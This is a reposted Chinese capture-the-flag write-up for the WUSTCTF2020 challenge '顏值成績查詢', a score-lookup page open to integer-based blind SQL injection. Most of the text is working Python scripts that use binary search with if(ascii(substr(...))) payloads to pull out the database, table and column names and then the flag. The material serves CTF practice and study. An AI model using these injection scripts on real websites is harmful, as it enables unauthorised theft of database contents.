碼上快樂

相關內容    簡體    繁體

[WUSTCTF2020]顏值成績查詢

本文轉載自   查看原文   2020-04-14 22:57   1057    ctf

[WUSTCTF2020]顏值成績查詢

整數型注入,盲注。

速度快,一定要二分法。

爆庫名:ctf

二分法核心payload

"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)

import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

回顯結果參考下圖:

image-20200414224348796

爆表

flag,score

import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)

		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

回顯結果參考下圖:

image-20200414224405361

爆列名

爆出flag和value兩個字段

import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)

		r = requests.get(url+payload)
		r.encoding = "utf-8"
		#print(url+payload)
		if "your score is: 100" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

image-20200414224752972

爆信息

flag表中有flag和value兩個字段

爆flag字段

爆的時候結果如下,沒有給flag猜測是在value字段。

image-20200414225005339

爆value字段,發現就是在value字段了。如果沒有的畫要爆一下別的。

還有啊二分法,一定要二分法。不然,遇到某些題可能你爆完比賽也結束了。

image-20200414225212551


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [WUSTCTF2020]顏值成績查詢 WUSTCTF2020 佛說:只能四天 刷題[WUSTCTF2020]CV Maker BUUOJ [WUSTCTF2020]朴實無華 BUUCTF-[WUSTCTF2020]朴實無華(代碼審計) 高顏值測試報告- XTestRunner 顏值非常高的Uniapp UI框架——ColorUI 提高代碼顏值的幾個小技巧 Python公眾號開發(二)—顏值檢測 065 女神顏值打分系統
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM